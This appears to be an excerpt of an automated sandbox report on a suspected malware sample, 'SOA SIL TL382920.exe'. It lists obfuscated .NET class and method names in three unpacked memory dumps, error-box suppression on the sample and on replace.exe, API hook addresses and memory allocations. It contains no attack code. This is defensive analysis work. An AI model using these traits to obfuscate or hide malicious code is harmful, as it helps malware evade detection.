Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D144
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC17650594
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764FF74
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D6C4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D864
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D004
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D144
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D604
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D764
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D324
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D364
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D004
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764FF74
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D864

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
